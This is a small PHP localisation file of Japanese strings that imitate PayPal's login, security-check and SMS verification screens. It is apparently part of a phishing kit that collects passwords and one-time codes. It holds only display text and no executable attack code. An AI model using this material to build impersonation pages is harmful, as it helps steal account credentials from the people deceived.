<?php

function lang($phrase){
    static $lang = array(
        '1' => 'PayPalアカウントにログイン',
        '2' => 'メールアドレスまたは携帯電話番号',
        '3' => 'パスワード',
        '4' => 'パスワードを忘れた場合',
        '5' => 'ログイン',
        '6' => 'または',
        '7' => '新規登録',
        '8' => '英語',
        '9' => 'フランス語',
        '10' => 'スペイン語',
        '11' => '中文',
        '12' => '迅速なセキュリティチェック',
        '13' => 'あなたが本当にあなたであることを確認するために、追加の情報が必要です。',
        '14' => 'テキストを受け取る',
        '15' => '続行すると、このセッションであなたの身元を確認するためにテキストメッセージを受け取る権限があることを確認し、キャリアの料金が発生する可能性があることに同意したものと見なされます。リスクおよび詐欺の目的でワイヤレスオペレータから加入者およびデバイスの詳細を受信する場合があります。',
        '16' => '次へ',
        '17' => 'コードを入力',
        '18' => '再送',
        '19' => '続ける',
        '20' => 'お問い合わせ',
        '21' => 'プライバシー',
        '22' => '法的事項',
        '23' => 'ポリシーの更新',
        '24' => '世界中',
        '25' => '無効なコード。新しいコードを送信しました。',
    );

    return $lang[$phrase];
}
?>
